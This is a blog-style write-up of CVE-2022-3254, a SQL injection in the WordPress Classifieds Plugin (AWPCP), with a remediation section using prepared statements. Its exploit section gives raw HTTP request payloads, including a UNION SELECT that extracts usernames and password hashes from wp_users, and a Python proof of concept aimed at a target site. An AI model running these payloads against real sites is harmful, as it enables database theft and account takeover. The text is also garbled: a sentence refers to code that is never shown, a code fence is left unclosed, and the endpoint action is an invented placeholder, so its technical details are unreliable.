---

If you run a WordPress site with a classifieds section, the WordPress Classifieds Plugin might be one of your top choices. But did you know, until version 4.3, it had a big security hole? This post breaks down CVE-2022-3254 — what went wrong, how you could exploit it (for educational purposes only!), and how to fix it.

What is CVE-2022-3254?

CVE-2022-3254 is a SQL injection vulnerability in the WordPress Classifieds Plugin (also called AWPCP) before version 4.3. Simply put, malicious users could break into your WordPress database with a carefully crafted request, even if they weren’t logged in. This weakness is extra serious because it’s accessible through AJAX, making automated attacks easy.

Why did this happen?  
Some AJAX handlers in the plugin did not properly sanitize (clean up) or escape (protect) user inputs, which then got mixed directly into SQL statements. That lets attackers sneak in their own database commands.

IMPORTANT: This issue only happens if a premium module of the plugin is activated. If you’re running the free version and never bought an add-on, you’re probably safe — but it’s always smart to check your plugin versions!

It then plugs those variables straight into a SQL query — without any safety checks or escaping.

- If an attacker sends something like '1 OR 1=1' in the right spot, they can mess with the query and see or change your data.

Visual Example of Bad Code (from similar open-source plugins)

// UNSAFE! DO NOT USE
$listing_id = $_POST['listing_id'];
$module = $_POST['module'];
// Direct query with no escaping
$query = "SELECT * FROM {$wpdb->prefix}classifieds WHERE id = $listing_id AND module='$module'";
$results = $wpdb->get_results($query);

If an attacker puts '1 OR 1=1' as $listing_id, they could read all the listings. But honestly, it can get much worse — attackers might extract sensitive data, create fake admin users, or even delete stuff.

Exploit Details

How would an attacker do this?  
Let’s say the plugin expects an AJAX request to /wp-admin/admin-ajax.php with a custom action (for instance: action=awpcp_specific_ajax_action). An attacker could POST data like:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

action=awpcp_specific_ajax_action&listing_id=%20OR%201=1&module=example

This translates the SQL query (after parsing) to something like

SELECT * FROM wp_classifieds WHERE id =  OR 1=1 AND module='example'

Because 1=1 is always true, all rows will be returned.

An advanced SQL payload in the POST data might look like

action=awpcp_specific_ajax_action&listing_id= UNION SELECT user_login, user_pass, null, null FROM wp_users -- &module=example

Proof-of-Concept Python Exploit

NOTE: This is for testing your own sites only.

import requests

url = 'https://target-site.com/wp-admin/admin-ajax.php';
data = {
    'action': 'awpcp_specific_ajax_action',
    'listing_id': " UNION SELECT user_login, user_pass, NULL, NULL FROM wp_users -- ",
    'module': 'example'
}

r = requests.post(url, data=data)
print(r.text)

Replace 'https://target-site.com/'; and 'awpcp_specific_ajax_action' with your actual values.

Go to your plugins page, check AWPCP, and update to version 4.3 or later. Official plugin page:

https://wordpress.org/plugins/another-wordpress-classifieds-plugin/

`php

// SAFE SQL
  $query = $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}classifieds WHERE id = %d AND module = %s", $listing_id, $module );

References

- Exploit Database Entry
- Wordfence Security Advisory
- Official Plugin Changelog
- CVE Details for CVE-2022-3254

Final Tips

Even popular WordPress plugins can have serious vulnerabilities that let outsiders take control of your website. Always keep plugins updated, remove unused add-ons, and scan your site for problems. And if you ever buy a premium module, know that it can open new risks as well as features!

Stay safe, and check your AWPCP version today!

Disclaimer:  
This writeup is for educational use to help WordPress site owners secure their websites. Don’t attempt unauthorized testing or exploitation of any website you don’t own.

Timeline

Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 13:58:00 UTC